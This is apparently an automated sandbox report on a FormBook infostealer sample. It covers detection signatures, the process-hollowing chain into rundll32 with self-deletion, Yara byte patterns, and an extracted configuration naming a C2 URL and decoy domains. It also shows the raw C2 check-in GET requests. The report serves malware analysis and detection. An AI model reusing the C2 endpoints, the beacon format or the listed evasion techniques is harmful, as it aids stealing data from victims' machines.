Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report PQMW0W5h3X.exe

Overview

General Information

Sample Name:PQMW0W5h3X.exe
Analysis ID:438543
MD5:6b26db585f40e14b00b5adda57e595dd
SHA1:ffbb4390c5cdb9d0aa78061399f5a9993a955dd3
SHA256:8b39bf75ce8ca2ecadafeb01a2ff33fc07419198e5b222bf20385ecbf2da0ff4
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PQMW0W5h3X.exe (PID: 6528 cmdline: 'C:\Users\user\Desktop\PQMW0W5h3X.exe' MD5: 6B26DB585F40E14B00B5ADDA57E595DD)
    • PQMW0W5h3X.exe (PID: 6608 cmdline: 'C:\Users\user\Desktop\PQMW0W5h3X.exe' MD5: 6B26DB585F40E14B00B5ADDA57E595DD)
  • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • rundll32.exe (PID: 6820 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 7032 cmdline: /c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        0.2.PQMW0W5h3X.exe.22c0000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.PQMW0W5h3X.exe.22c0000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6820
          Sigma detected: Suspicious Process Start Without DLLShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6820
          Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6820

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PQMW0W5h3X.exeVirustotal: Detection: 17%Perma Link
          Source: PQMW0W5h3X.exeReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: PQMW0W5h3X.exeJoe Sandbox ML: detected
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.rundll32.exe.4d4be0.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.PQMW0W5h3X.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.rundll32.exe.4ac7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.2.PQMW0W5h3X.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PQMW0W5h3X.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.355795813.000000000DD20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PQMW0W5h3X.exe, 00000000.00000003.330363976.00000000097A0000.00000004.00000001.sdmp, PQMW0W5h3X.exe, 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, rundll32.exe, 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PQMW0W5h3X.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: PQMW0W5h3X.exe, 00000002.00000002.382267305.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: PQMW0W5h3X.exe, 00000002.00000002.382267305.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.355795813.000000000DD20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 172.67.129.33:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 172.67.129.33:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 172.67.129.33:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49768 -> 52.79.124.173:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49768 -> 52.79.124.173:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49768 -> 52.79.124.173:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.extinctionbrews.com/dy8g/
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A== HTTP/1.1Host: www.invisiongc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=cuaraJgkoEfCri9CHpn14TbyfEdnqeu3xvSLUqjD8bR4lpFRWk9obMnQWFhWIe7eI+ID23wHyg==&6l-=6lY0 HTTP/1.1Host: www.killrstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=txuHOH5mmlRIAzfI6nqq0ViggBeEQnMt8DQXoVThNh6+jXgye1aguJwAyFZ9eO3q4TbjPHrHlw== HTTP/1.1Host: www.ivoirepneus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&6l-=6lY0 HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o1L2qAF92htTMNNUg== HTTP/1.1Host: www.cindywillardrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY0 HTTP/1.1Host: www.doityourselfism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0 HTTP/1.1Host: www.builtbydawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=rxSGsMlf+TpCm2paceR4OA9vkYPhboYZiWSl1OoSBIXvvwNRDuCI148weh0JxST9QqctWF9UAQ== HTTP/1.1Host: www.qq66520.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=GqSDmzIjGNxp2FecVmHvyCO88qwvtjnKiC416l48PhUYnL/NIW7nDNxc91PxOE41cEyZFixE4g==&6l-=6lY0 HTTP/1.1Host: www.mzyxi-rkah-y.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w== HTTP/1.1Host: www.thenorthgoldline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=xnzbbPmlZmYZGqrTQxh0SyAvVYBEHJsgluOUHMC+sqx7GSIQl98agFOAtXHHwP8thCN3RkXuRg==&6l-=6lY0 HTTP/1.1Host: www.guys-only.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBBJXfdNhkQaXcLrpw== HTTP/1.1Host: www.wideawakemomma.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 213.186.33.5 213.186.33.5
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A== HTTP/1.1Host: www.invisiongc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=cuaraJgkoEfCri9CHpn14TbyfEdnqeu3xvSLUqjD8bR4lpFRWk9obMnQWFhWIe7eI+ID23wHyg==&6l-=6lY0 HTTP/1.1Host: www.killrstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=txuHOH5mmlRIAzfI6nqq0ViggBeEQnMt8DQXoVThNh6+jXgye1aguJwAyFZ9eO3q4TbjPHrHlw== HTTP/1.1Host: www.ivoirepneus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&6l-=6lY0 HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o1L2qAF92htTMNNUg== HTTP/1.1Host: www.cindywillardrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY0 HTTP/1.1Host: www.doityourselfism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0 HTTP/1.1Host: www.builtbydawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=rxSGsMlf+TpCm2paceR4OA9vkYPhboYZiWSl1OoSBIXvvwNRDuCI148weh0JxST9QqctWF9UAQ== HTTP/1.1Host: www.qq66520.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=GqSDmzIjGNxp2FecVmHvyCO88qwvtjnKiC416l48PhUYnL/NIW7nDNxc91PxOE41cEyZFixE4g==&6l-=6lY0 HTTP/1.1Host: www.mzyxi-rkah-y.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w== HTTP/1.1Host: www.thenorthgoldline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=xnzbbPmlZmYZGqrTQxh0SyAvVYBEHJsgluOUHMC+sqx7GSIQl98agFOAtXHHwP8thCN3RkXuRg==&6l-=6lY0 HTTP/1.1Host: www.guys-only.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBBJXfdNhkQaXcLrpw== HTTP/1.1Host: www.wideawakemomma.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.invisiongc.net
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: PQMW0W5h3X.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: PQMW0W5h3X.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: rundll32.exe, 00000004.00000002.595657754.0000000004C42000.00000004.00000001.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.337441844.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
